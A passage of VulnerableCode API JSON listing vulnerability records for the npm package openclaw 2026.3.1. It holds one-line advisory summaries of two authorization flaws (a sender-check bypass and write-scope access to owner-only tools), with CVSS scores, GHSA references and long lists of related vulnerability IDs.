{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-32041","GHSA-vpj2-69hf-rppw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a54z-trcv-p3b8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50477?format=json","vulnerability_id":"VCID-h6ka-w3qr-yuhe","summary":"OpenClaw has an unauthorized sender bypass in its stop triggers and /models command authorization\nUnauthorized senders could trigger two command paths without sender authorization checks:\n1. stop-like natural-language abort triggers\n2. 
`/models` command output","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-8m9v-xpgf-g99m","reference_id":"GHSA-8m9v-xpgf-g99m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8m9v-xpgf-g99m"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8m9v-xpgf-g99m","reference_id":"GHSA-8m9v-xpgf-g99m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8m9v-xpgf-g99m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26s
g-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75y
r-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw
7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-hax
d-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7m
e-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-tws
q-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8j
c-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-8m9v-xpgf-g99m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h6ka-w3qr-yuhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50482?format=json","vulnerability_id":"VCID-nxnv-bqua-gkcb","summary":"OpenClaw's authorization mismatch allowed write-scope agent runs to reach owner-only tools\nAn authorization mismatch allowed authenticated callers with `operator.write` access to invoke owner-only tool surfaces (`gateway`, `cron`) through `agent` runs in scoped-token 
deployments.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-jr6x-2q95-fh2g","reference_id":"GHSA-jr6x-2q95-fh2g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr6x-2q95-fh2g"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jr6x-2q95-fh2g","reference_id":"GHSA-jr6x-2q95-fh2g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jr6x-2q95-fh2g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerabilit
y":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerabilit
y":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-t